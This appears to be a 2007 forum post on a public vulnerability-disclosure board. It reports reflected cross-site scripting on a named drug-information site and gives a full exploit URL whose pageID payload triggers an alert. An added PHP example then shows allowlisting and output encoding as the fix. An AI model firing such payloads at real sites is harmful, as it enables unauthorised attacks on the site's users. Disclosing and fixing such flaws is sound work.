sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
druginfonet.com xss via url
Posted by: Spyware
Date: February 11, 2007 03:56PM

//XSS//
http://www.druginfonet.com/index.php?pageID=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
//ENDXSS//

Wrong URL gets parsed CRAZY on the site. Try it out. (1 alert, VERY many parses).

I was lazy so I just used the cheatsheet. There's probably a better way of doing this, go figure.

I'm off to bed, have fun.

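The post reports that an unexpected `pageID` value ends up parsed many times in the returned page. As an added example (not part of the original post and not the site's code), this hypothetical PHP handler allowlists `pageID` and, where a value must still be echoed, encodes it separately for HTML and JavaScript contexts. `KNOWN_PAGES`, the function names and the sample string are assumptions made for the illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist of page identifiers (assumption for this example).
const KNOWN_PAGES = ['home', 'faqs', 'news'];

// Map the raw query value to a known page; never echo an unknown value back.
function resolve_page_id(?string $raw): string
{
    return ($raw !== null && in_array($raw, KNOWN_PAGES, true)) ? $raw : 'home';
}

// Encode for HTML text and quoted attribute values.
function html_ctx(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode as a JavaScript string literal that stays inert inside <script>.
function js_ctx(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed sample: a shortened, URL-decoded form of the pageID value in the post.
$sample = "';alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'>"
        . "<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>";

// 1. Allowlist: the unexpected value is replaced before it reaches any template.
echo 'page: ', resolve_page_id($sample), PHP_EOL;

// 2. Defence in depth: a value that must be reflected is encoded per context.
$html = html_ctx($sample);
$js   = js_ctx($sample);
echo 'html: ', $html, PHP_EOL;
echo 'js:   ', $js, PHP_EOL;

// Check that no raw quote or angle bracket survives in either encoded form
// (the JSON form is checked without its own surrounding double quotes).
$unsafe = '/[<>"\']/';
if (preg_match($unsafe, $html) === 1 || preg_match($unsafe, substr($js, 1, -1)) === 1) {
    throw new RuntimeException('encoded output still contains markup characters');
}
echo 'encoded output contains no raw quotes or angle brackets', PHP_EOL;
```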

